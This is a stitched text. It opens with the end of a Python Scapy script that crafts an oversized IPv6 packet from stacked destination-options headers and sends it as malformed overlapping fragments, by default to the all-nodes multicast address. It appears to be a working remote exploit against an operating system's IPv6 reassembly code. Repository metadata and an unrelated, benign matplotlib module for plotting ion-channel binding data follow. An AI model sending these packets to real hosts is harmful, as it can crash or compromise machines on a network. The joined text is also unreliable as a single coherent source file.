IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xa0)), ]) \ / IPv6ExtHdrFragment( id = second_pkt_id, m = 1, nh = 17, offset = 0 ) \ / UDP(dport = 31337, sport = 31337, chksum=0x7e7f) reassembled_pkt = bytes(reassembled_pkt) assert (len(reassembled_pkt) % 8) == 0, 'not aligned' frags = frag6(args.target, frag_id, reassembled_pkt, 60) print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}') sendp(frags, iface= args.iface) reassembled_pkt_2 = Ether() \ / IPv6(dst = args.target) \ / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \ / 'doar-e ftw' sendp(reassembled_pkt_2, iface = args.iface) def main(): parser = argparse.ArgumentParser() parser.add_argument('--target', default = 'ff02::1') parser.add_argument('--iface', default = 'eth1') args = parser.parse_args() pull_the_trigger(args) return if __name__ == '__main__': main()

34.647815

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1

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1

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null

0

10

851d2b06fb9d60216cfc2ff1c100e988682c2cc9

108,164

py

Python

ChannelAnalysis/CoordAnalysis/Plots.py

cing/ChannelAnalysis

46fed870dab93545cb35cc1554303f048072d2f1

[ "MIT" ]

1

2022-03-16T14:22:48.000Z

ChannelAnalysis/CoordAnalysis/Plots.py

cing/ChannelAnalysis

46fed870dab93545cb35cc1554303f048072d2f1

[ "MIT" ]

null

ChannelAnalysis/CoordAnalysis/Plots.py

cing/ChannelAnalysis

46fed870dab93545cb35cc1554303f048072d2f1

[ "MIT" ]

null

#!/usr/bin/python ############################################################################### # # This script takes processed data from CoordAnalysis functions and prepares # awesome plots using matplotlib. Unfortunately, it's highly specific # to the system being studied and often requires serious tweaking of ranges # and scaling (especially for histograms). # # By Chris Ing, 2013 for Python 2.7 # ############################################################################### import matplotlib.pyplot as plt import matplotlib.gridspec as gridspec import matplotlib as mpl from matplotlib.ticker import MultipleLocator, FormatStrFormatter from matplotlib.patches import Rectangle from numpy import array from itertools import combinations,product from operator import itemgetter # Plots ion binding modes along channel axis. def plot_bindingmode_histograms(group_histo_1st, group_histo_2nd, group_histo_both, selectivityf_map, plot_title="Ion Binding Mode Histograms", prefix=None): # Make a list of all binding modes so that the colors will be the same # in all of the plots. all_modes = sorted(set(group_histo_1st[0].keys() + group_histo_2nd[0].keys() + group_histo_both[0].keys()),reverse=True) # Labelling is very complicated for multiple subplots with different # lines on each one. All must be tracked. leg_series = [] leg_lbl = [] leg_num = [] fig = plt.figure() # PLOT 1 - 1ST COORDINATION ax1 = fig.add_subplot(3,1,1) # 12 plot color scheme generated using http://colorbrewer2.org/ # with extra ones added on the end... plot_colors = ["#8DD3C7","#FFFFB3","#BEBADA","#FB8072","#80B1D3", "#FDB462","#B3DE69","#FCCDE5","#D9D9D9","#BC80BD", "#CCEBC5","#FFED6F","#E31A1C","#6A3D9A","#1F78B4", "#33A02C","#BF812D","#01665E","#C51B7D","#276419", "#C51B7D","#BABABA","#8E0152","#FF7F00","#FFFF33"] num_sfvals = len(group_histo_1st[0].keys()[0]) for mode_id, mode in enumerate(all_modes): if mode in group_histo_1st[0]: mode_histo = group_histo_1st[0][mode] mode_x = group_histo_1st[1][mode][1:] diff = (mode_x[1]-mode_x[0])/2.0 mode_x_shift = (mode_x - diff)*-10 # Here we treat the ++ (any coordinated ion) and 00 # (no coordination) ions specifically. if mode == "+"*num_sfvals: mode_string = "Bound to SF" temp_plot, = ax1.plot(mode_x_shift, mode_histo, linewidth=2.5, color="black", zorder = 0, label="Bound to SF") elif mode == "0"*num_sfvals: mode_string = "Unbound to SF" temp_plot, = ax1.plot(mode_x_shift, mode_histo, 'k--', linewidth=2.5, color="black", zorder = 0, label="Unfound to SF") else: mode_string = " ".join([selectivityf_map[int(num)] for num, digit in enumerate(mode) if int(digit) > 0]) #temp_plot, = ax1.plot(mode_x_shift, mode_histo, # linewidth=2.0, # color=plot_colors[mode_id], # label=mode_string) temp_plot = Rectangle((0.5, 0.5), 1, 1, color=plot_colors[mode_id], alpha=0.75) ax1.fill_between(mode_x_shift, 0, mode_histo, linewidth=0.5, facecolor=plot_colors[mode_id], alpha=0.75) if mode_string not in leg_lbl: leg_series.append(temp_plot) leg_lbl.append(mode_string) leg_num.append(mode) ax1.set_ylim(bottom=0) ax1.xaxis.set_major_locator(MultipleLocator(2)) ax1.xaxis.set_minor_locator(MultipleLocator(1)) #ax1.xaxis.set_major_locator(MultipleLocator(50)) #ax1.xaxis.set_minor_locator(MultipleLocator(25)) ax1.set_axisbelow(True) ax1.yaxis.grid(True,'minor') ax1.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.xaxis.grid(True,'minor') ax1.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax1.set_ylabel("1st") plt.setp(ax1.get_yticklabels(), visible=False) plt.setp(ax1.get_xticklabels(), visible=False) ax1.grid(True) # PLOT 2 - 2ND COORDINATION ax2 = fig.add_subplot(3,1,2) for mode_id, mode in enumerate(all_modes): if mode in group_histo_2nd[0]: mode_histo = group_histo_2nd[0][mode] mode_x = group_histo_2nd[1][mode][1:] diff = (mode_x[1]-mode_x[0])/2.0 mode_x_shift = (mode_x - diff)*-10 # Here we treat the ++ (any coordinated ion) and 00 # (no coordination) ions specifically. if mode == "+"*num_sfvals: mode_string = "Bound to SF" temp_plot, = ax2.plot(mode_x_shift, mode_histo, linewidth=2.5, color="black", zorder = 0, label="Bound to SF") elif mode == "0"*num_sfvals: mode_string = "Unbound to SF" temp_plot, = ax2.plot(mode_x_shift, mode_histo, 'k--', linewidth=2.5, color="black", zorder = 0, label="Unfound to SF") else: mode_string = " ".join([selectivityf_map[int(num)] for num, digit in enumerate(mode) if int(digit) > 0]) #temp_plot, = ax2.plot(mode_x_shift, mode_histo, # linewidth=2.0, # color=plot_colors[mode_id], # label=mode_string) temp_plot = Rectangle((0.5, 0.5), 1, 1, color=plot_colors[mode_id], alpha=0.75) ax2.fill_between(mode_x_shift, 0, mode_histo, linewidth=0.5, facecolor=plot_colors[mode_id], alpha=0.75) if mode_string not in leg_lbl: leg_series.append(temp_plot) leg_lbl.append(mode_string) leg_num.append(mode) ax2.set_ylim(bottom=0) ax2.xaxis.set_major_locator(MultipleLocator(2)) ax2.xaxis.set_minor_locator(MultipleLocator(1)) #ax2.xaxis.set_major_locator(MultipleLocator(50)) #ax2.xaxis.set_minor_locator(MultipleLocator(25)) ax2.set_axisbelow(True) ax2.yaxis.grid(True,'minor') ax2.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.xaxis.grid(True,'minor') ax2.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax2.set_ylabel("2nd") plt.setp(ax2.get_yticklabels(), visible=False) plt.setp(ax2.get_xticklabels(), visible=False) ax2.grid(True) # PLOT 3 - BOTH COORDINATION ax3 = fig.add_subplot(3,1,3) for mode_id, mode in enumerate(all_modes): if mode in group_histo_both[0]: mode_histo = group_histo_both[0][mode] mode_x = group_histo_both[1][mode][1:] diff = (mode_x[1]-mode_x[0])/2.0 mode_x_shift = (mode_x - diff)*-10 # Here we treat the ++ (any coordinated ion) and 00 # (no coordination) ions specifically. if mode == "+"*num_sfvals: mode_string = "Bound to SF" temp_plot, = ax3.plot(mode_x_shift, mode_histo, linewidth=2.5, color="black", zorder = 0, label="Bound to SF") elif mode == "0"*num_sfvals: mode_string = "Unbound to SF" temp_plot, = ax3.plot(mode_x_shift, mode_histo, 'k--', linewidth=2.5, color="black", zorder = 0, label="Unfound to SF") else: mode_string = " ".join([selectivityf_map[int(num)] for num, digit in enumerate(mode) if int(digit) > 0]) #temp_plot, = ax3.plot(mode_x_shift, mode_histo, # linewidth=2.0, # color=plot_colors[mode_id], # label=mode_string) temp_plot = Rectangle((0.5, 0.5), 1, 1, color=plot_colors[mode_id], alpha=0.75) ax3.fill_between(mode_x_shift, 0, mode_histo, linewidth=0.5, facecolor=plot_colors[mode_id], alpha=0.75) if mode_string not in leg_lbl: leg_series.append(temp_plot) leg_lbl.append(mode_string) leg_num.append(mode) ax3.set_ylim(bottom=0) ax3.xaxis.set_major_locator(MultipleLocator(2)) ax3.xaxis.set_minor_locator(MultipleLocator(1)) #ax3.xaxis.set_major_locator(MultipleLocator(50)) #ax3.xaxis.set_minor_locator(MultipleLocator(25)) ax3.set_axisbelow(True) ax3.yaxis.grid(True,'minor') ax3.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax3.xaxis.grid(True,'minor') ax3.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax3.set_ylabel("Both") plt.setp(ax3.get_yticklabels(), visible=False) ax3.grid(True) # Now general plot things all_modes_names = [] for mode in all_modes: if ((mode in group_histo_1st[0]) or (mode in group_histo_2nd[0]) or (mode in group_histo_both[0])): if mode == "+"*num_sfvals: all_modes_names.append("Bound to SF") elif mode == "0"*num_sfvals: all_modes_names.append("Unbound to SF") else: all_modes_names.append(" ".join([selectivityf_map[int(num)] for num, digit in enumerate(mode) if int(digit) > 0])) # Sort the axis labels based on the numerical code sorted in reverse. # This is so the "Bound to SF" and "Unbound to SF" envelopes are last. sorted_legenddata = sorted(zip(leg_series,leg_lbl, leg_num), key=itemgetter(2), reverse=True) sorted_series, sorted_lbl, _ = zip(*sorted_legenddata) print sorted_lbl leg = ax1.legend(tuple(sorted_series),tuple(sorted_lbl), bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=6, mode="expand", borderaxespad=0.) for t in leg.get_texts(): t.set_fontsize(6) plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.75) plt.suptitle(plot_title) if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() return True # This is for plotting ion-ion 2d histograms. It is useful for visualizing # correlations between ion positions for different occupancy states. # Expects quite a specific data format of keys in the form "occ_id:ion1-ion2" def plot_ionsplit_2dhistograms(ionsplit_2dhisto, ion_num_cutoff=3, plot_title="Ion Split 2D Histograms", prefix=None): # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() num_rows = len(ionsplit_2dhisto[0].keys()) num_cols = max([len(val) for key,val in ionsplit_2dhisto[0].iteritems()]) print "Detected ", num_rows, " rows and ", num_cols, " cols" print ionsplit_2dhisto[0].keys(), [len(val) for key,val in ionsplit_2dhisto[0].iteritems()] for row_count, occ_id in enumerate(sorted(ionsplit_2dhisto[0].keys())): occ_histos = ionsplit_2dhisto[0][occ_id] occ_xs = ionsplit_2dhisto[1][occ_id] occ_ys = ionsplit_2dhisto[2][occ_id] # For labelling purposes, generate the same combinations that # will be used to title the plots ion_name_def = ["R","G","B","P"] occ_pairs = list(combinations(range(min(occ_id,ion_num_cutoff)),2)) occ_pairs_name = [(ion_name_def[x],ion_name_def[y]) for x,y in occ_pairs] plot_position = 1+row_count*num_cols first_col = True for pair_id, (histo, x, y) in enumerate(zip(occ_histos, occ_xs, occ_ys)): extent = [-10*x[0], -10*x[-1], 10*y[-1], 10*y[0]] ax = fig.add_subplot(num_rows, num_cols, plot_position) histo_y_flipped = histo[::-1, :] cax = ax.imshow(histo_y_flipped, extent=extent, interpolation='nearest', cmap=mpl.cm.CMRmap) ax.autoscale(False) ax.plot(range(-13,14),range(-13,14),linewidth=1.0,color='k') ax.yaxis.set_major_locator(MultipleLocator(4)) ax.yaxis.set_minor_locator(MultipleLocator(2)) ax.xaxis.set_major_locator(MultipleLocator(4)) ax.xaxis.set_minor_locator(MultipleLocator(2)) ax.set_axisbelow(True) ax.yaxis.grid(True,'minor') ax.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.xaxis.grid(True,'minor') ax.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.set_title(str(occ_pairs_name[pair_id])) plot_position += 1 if row_count+1 != num_rows: plt.setp(ax.get_xticklabels(), visible=False) if not first_col: plt.setp(ax.get_yticklabels(), visible=False) else: ax.set_ylabel(str(occ_id)+" ions") first_col = False #ax.set_title(plot_title) plt.subplots_adjust(hspace = 0.2, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.8, top = 0.90) plt.suptitle(plot_title) # Add colorbar, make sure to specify tick locations to match desired ticklabels #plt.colorbar() #cbar = fig.colorbar(cax, ticks=[0, 2.5, 5]) #fig.subplots_adjust(right=0.8) cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7]) fig.colorbar(cax, cax=cbar_ax, ticks=[0, 1, 2, 3, 4, 5, 6]) #cbar_ax.set_yticklabels(['free energy (kcal/mol)'], rotation=90) cbar_ax.set_ylabel('free energy (kcal/mol)', rotation=270) if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() return True # Plots inner ion species ordering histograms. def plot_species_histograms(species_histo, species_map, species_populations, plot_title="Ion Species Ordering Histograms", prefix=None): # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() num_rows = len(species_histo[0].keys()) for row_count, species_id in enumerate(sorted(species_histo[0].keys())): spc_histos = species_histo[0][species_id] spc_xs = species_histo[1][species_id] # For labelling purposes, generate the same combinations that # will be used to title the plots color_list = ["R","G","B","#663399","C","0.1","0.2","0.3", "0.4","0.5","0.6","0.7"] # First, extract the population of the particular occupancy # state, if it doesn't mean the cutoff of 0.5%< of the dataset # then give it a boot! spc_index = species_populations[1]["MEAN"].index(int(species_id)) mean_val = species_populations[0]["MEAN"][spc_index]*100 stderr_val = species_populations[0]["STDERR"][spc_index]*100 ax = fig.add_subplot(num_rows, 1, row_count+1) for ion_id, (histo, edges) in enumerate(zip(spc_histos, spc_xs)): channel_spc_hist_x = array(edges[1:]) diff = (channel_spc_hist_x[1]-channel_spc_hist_x[0])/2.0 channel_spc_hist_x_shift = (channel_spc_hist_x - diff)*-10 channel_spc_hist_y = array(histo) ax.plot(channel_spc_hist_x_shift, channel_spc_hist_y, linewidth=2.5, color=color_list[ion_id]) #ax.yaxis.set_major_locator(MultipleLocator(4)) #ax.yaxis.set_minor_locator(MultipleLocator(2)) ax.xaxis.set_major_locator(MultipleLocator(2)) ax.xaxis.set_minor_locator(MultipleLocator(1)) ax.set_axisbelow(True) ax.yaxis.grid(True,'minor') ax.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.xaxis.grid(True,'minor') ax.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.set_ylabel(species_map[int(species_id)]) plt.setp(ax.get_yticklabels(), visible=False) plt.setp(ax.get_xticklabels(), visible=False) #l = ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) #for t in l.get_texts(): # t.set_fontsize(6) plt.text(0.15, 0.70, r"Pop: {:.1f}% $\pm$ {:.1f}%".format(mean_val,stderr_val), ha='center', va='center', transform=ax.transAxes) else: # If it's the last plot of the for loop, then give it special # treatment. Technically this could be outside the for clause... plt.setp(ax.get_xticklabels(), visible=True) ax.set_xlabel("Axial position (Ang)") plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.80, top = 0.93) plt.suptitle(plot_title) if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() return True # Plots ion pair distance histograms. def plot_iondist_histograms(iondist_histo, ion_num_cutoff=3, plot_title="Ion Pair Distance Histograms", prefix=None): # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() num_rows = len(iondist_histo[0].keys()) for row_count, occ_id in enumerate(sorted(iondist_histo[0].keys())): occ_histos = iondist_histo[0][occ_id] occ_xs = iondist_histo[1][occ_id] # For labelling purposes, generate the same combinations that # will be used to title the plots ion_name_def = ["R","G","B","P"] occ_pairs = list(combinations(range(min(occ_id,ion_num_cutoff)),2)) occ_pairs_name = [(ion_name_def[x],ion_name_def[y]) for x,y in occ_pairs] ax = fig.add_subplot(num_rows, 1, row_count+1) for pair_id, (histo, edges) in enumerate(zip(occ_histos, occ_xs)): channel_occ_hist_x = array(edges[1:]) diff = (channel_occ_hist_x[1]-channel_occ_hist_x[0])/2.0 channel_occ_hist_x_shift = (channel_occ_hist_x - diff)*-10 channel_occ_hist_y = array(histo) ax.plot(channel_occ_hist_x_shift, channel_occ_hist_y, linewidth=2.5, label=str(occ_pairs_name[pair_id])) #ax.yaxis.set_major_locator(MultipleLocator(4)) #ax.yaxis.set_minor_locator(MultipleLocator(2)) ax.xaxis.set_major_locator(MultipleLocator(2)) ax.xaxis.set_minor_locator(MultipleLocator(1)) ax.set_axisbelow(True) ax.yaxis.grid(True,'minor') ax.yaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.xaxis.grid(True,'minor') ax.xaxis.grid(True,'major', linewidth=0.5, linestyle='-') ax.set_ylabel(str(occ_id)+" Ion Pair Dens.") plt.setp(ax.get_yticklabels(), visible=False) plt.setp(ax.get_xticklabels(), visible=False) l = ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.) for t in l.get_texts(): t.set_fontsize(6) else: # If it's the last plot of the for loop, then give it special # treatment. Technically this could be outside the for clause... plt.setp(ax.get_xticklabels(), visible=True) ax.set_xlabel("Axial position (Ang)") plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.80, top = 0.93) plt.suptitle(plot_title) if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() return True # This is for plotting global ion distributions for different # ion occupancy states along with statistics about how often # those states occured in the entire dataset. This is a figure of # the global data and shows averages across all trajectories. def plot_ionsplit_histograms(ionsplit_histo, occ_populations, allion_histo, allatom_histos, occ_pop_cutoff = 0.5, plot_title="Ion Split Histograms", prefix=None): # Color cycle should be initialized very early. mpl.rcParams['axes.color_cycle'] = ['r', 'g', 'b', 'm', 'c', 'y', 'k'] # Initialize the figure and compute the number of rows that will # be needed in the figure to capture all the data. fig = plt.figure() # Prepare a list of binary values and use it to compute how many # are above the occupancy population cutoff. num_plots = sum([x*100 >= occ_pop_cutoff for x in occ_populations[0]["MEAN"]])+1 # Initialize the top-most histogram ax = fig.add_subplot(num_plots,1,1) # Define a new color scheme for this purpose only. oxy_colors = ["#DCFFAC","#E8AB4E","#FF49A4","#4E63E8","#56FFA6", "#248077","#74AD8D","#C82754","#F7BB21","#F9E2B7"] # Plot the channel oxygen distributions, however many there are. for color_id, histo in enumerate(allatom_histos): #for color_id, histo in enumerate(allatom_histos[::-1]): channel_oxy_hist_x = (array(histo[1]["ALL"][1:])) diff = (channel_oxy_hist_x[1]-channel_oxy_hist_x[0])/2.0 channel_oxy_hist_x_shift = (channel_oxy_hist_x - diff)*-1 channel_oxy_hist_y = (array(histo[0]["ALL"])) ax.fill_between(channel_oxy_hist_x_shift, 0, channel_oxy_hist_y, linewidth=0.5, facecolor=oxy_colors[color_id], alpha=0.8) channel_occ_hist_x = (array(allion_histo[1]["ALL"][1:])) diff = (channel_occ_hist_x[1]-channel_occ_hist_x[0])/2.0 channel_occ_hist_x_shift = (channel_occ_hist_x - diff)*-1 # Here we multiply the height by 2 since typically it isn't as high # as the oxygen distribution plotted above. channel_occ_hist_y = (array(allion_histo[0]["ALL"]))*2 ax.plot(channel_occ_hist_x_shift, channel_occ_hist_y, linewidth=2.5, color="black") ax.set_ylim(bottom=0) ax.grid(True) ax.set_ylabel("ALL Density") plt.setp(ax.get_xticklabels(), visible=False) plt.setp(ax.get_yticklabels(), visible=False) ax.xaxis.set_major_locator(MultipleLocator(0.2)) ax.xaxis.set_minor_locator(MultipleLocator(0.1)) # Loop over the datafile which is a tuple of two dictionaries # (one with the z vals and the other with the histogram height) # that are both key'd by the occupancy number and valued by # a list of length equal to that occupancy number. occ_count = 1 for occ_id in ionsplit_histo[0].keys(): # First, extract the population of the particular occupancy # state, if it doesn't mean the cutoff of 0.5%< of the dataset # then give it a boot! occ_index = occ_populations[1]["MEAN"].index(occ_id) mean_val = occ_populations[0]["MEAN"][occ_index]*100 stderr_val = occ_populations[0]["STDERR"][occ_index]*100 if mean_val >= occ_pop_cutoff: # Since it's only 1 column of a known number of plots, # add it to the existing figure increasingly lower. ax = fig.add_subplot(num_plots,1,occ_count+1) # Increase the counter of valid occupancy states occ_count += 1 # Now plot multiple lines on each plot depending on the # length of the occupancy array. for ion_num in range(len(ionsplit_histo[1][occ_id])): channel_occ_hist_x = (array(ionsplit_histo[1][occ_id][ion_num][1:])) diff = (channel_occ_hist_x[1]-channel_occ_hist_x[0])/2.0 channel_occ_hist_x_shift = (channel_occ_hist_x - diff)*-10 channel_occ_hist_y = (array(ionsplit_histo[0][occ_id][ion_num])) ax.plot(channel_occ_hist_x_shift, channel_occ_hist_y, linewidth=2.5) ax.grid(True) ax.set_ylim(bottom=0) ax.set_ylabel(str(occ_id)+" Ion Density") ax.set_xlabel("Axial position (Ang)") plt.setp(ax.get_xticklabels(), visible=False) plt.setp(ax.get_yticklabels(), visible=False) ax.xaxis.set_major_locator(MultipleLocator(2)) ax.xaxis.set_minor_locator(MultipleLocator(1)) plt.text(0.15, 0.9, r"Pop: {:.1f}% $\pm$ {:.1f}%".format(mean_val,stderr_val), ha='center', va='center', transform=ax.transAxes) else: # If it's the last plot of the for loop, then give it special # treatment. Technically this could be outside the for clause... plt.setp(ax.get_xticklabels(), visible=True) ax.set_xlabel("Axial position (nm)") plt.subplots_adjust(hspace = 0.1, wspace = 0.02, left = 0.1, bottom = 0.08, right = 0.95, top = 0.93) plt.suptitle(plot_title) if prefix != None: plt.savefig(prefix+".pdf") else: plt.show() return True # This plots a stacked timeseries of trajectory properties in the main column # and histograms of this data in a second column. Sorry for the god-awful # number of arguments... def plot_oxy_timeseries(alloxygen_ts, sf_ts, time_conv=0.02, prefix=None, plot_title="Oxygen Timeseries", max_coord=4, max_length=500, data_skip=10, hist_scale=0.4): # This iterates over all the trajectory id's that you computed data for. # 